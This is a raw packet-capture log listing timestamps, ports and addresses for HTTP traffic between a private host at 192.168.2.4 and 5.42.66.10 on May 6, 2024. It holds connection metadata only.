May 6, 2024 07:53:07.682177067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682178974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682204008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682225943 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682235956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682246923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682256937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682267904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682276011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682280064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682292938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682292938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682306051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682323933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682324886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682337999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682339907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682352066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682359934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682415009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682439089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682451963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682463884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682476044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682478905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682487965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682501078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682504892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682512045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682534933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682535887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682548046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682552099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682559967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682573080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682574034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682585001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682607889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682619095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682631969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682641029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682643890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682655096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682657957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682667017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682678938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682684898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682719946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682724953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682737112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682748079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682759047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682763100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682770967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682782888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682785034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682795048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682807922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682813883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682818890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682830095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682832003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682842016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682857037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682863951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682868958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682879925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682899952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682903051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682918072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682925940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682929039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682931900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682960033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.682965994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682976961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.682988882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683001995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683005095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683013916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683027029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683032036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683057070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683063984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683077097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683089018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683099985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683119059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683120966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683130026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683134079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683136940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683144093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683176994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683195114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683199883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683252096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683288097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683300972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683326006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683342934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683346033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683356047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683367014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683378935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683378935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683393002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683434010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683449984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683460951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683460951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683478117 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.683485985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683509111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.683532953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.934895992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935075998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935132027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935144901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935156107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935169935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935188055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935228109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935461044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935473919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935484886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935503006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935513020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935516119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935527086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935539007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935550928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935553074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935578108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935600996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935631037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935642958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935652971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935664892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935669899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935677052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935689926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935692072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935702085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935710907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935713053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935734987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935734987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935750961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935754061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935762882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935775995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935800076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935836077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935847998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935861111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935870886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935875893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935883045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935894012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935904026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935908079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935918093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935923100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935930014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935941935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935950994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935952902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935964108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935965061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935975075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935976982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.935987949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.935998917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936005116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936012983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936022997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936028957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936036110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936041117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936048031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936060905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936070919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936110020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936110973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936122894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936134100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936145067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936148882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936156988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936175108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936198950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936198950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936213017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936223984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936234951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936235905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936249018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936259031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936263084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936275005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936280966 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936299086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936306000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936328888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936342001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936350107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936355114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936366081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936372995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936388969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936394930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936408997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936429977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936482906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936495066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936506987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936517954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936530113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936532974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936542034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936559916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936572075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936583996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936604977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936618090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936630964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936633110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936645031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936654091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936656952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936670065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936672926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936681986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936692953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936722994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936764002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936774969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936786890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936798096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936801910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936810970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936831951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936861992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936886072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936898947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936918974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936928034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936929941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936942101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936945915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936954021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936961889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936965942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936975956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936988115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.936997890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.936999083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937011003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937022924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937022924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937035084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937047005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937052965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937060118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937072992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937083006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937092066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937094927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937103987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937105894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937119007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937129974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937131882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937144041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937148094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937181950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937210083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937241077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937252045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937263012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937277079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937282085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937289953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937302113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937303066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937314034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937326908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937339067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937345982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937351942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937364101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937374115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937377930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937386990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937397957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937398911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937410116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937417984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937423944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937434912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937443972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937447071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937459946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937470913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937483072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937489986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937489986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937494993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937508106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937521935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937530994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937534094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937545061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937571049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937588930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937613964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937625885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937637091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937649965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937654972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937661886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937674046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937680006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937695026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937707901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937719107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937720060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937731981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937740088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937745094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:07.937772036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:07.937798977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190514088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190529108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190540075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190551996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190562963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190574884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190587997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190596104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190601110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190613031 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190656900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190670013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.190761089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190773010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.190783024 CEST	80	49741	5.42.66.10	192.168.2.4
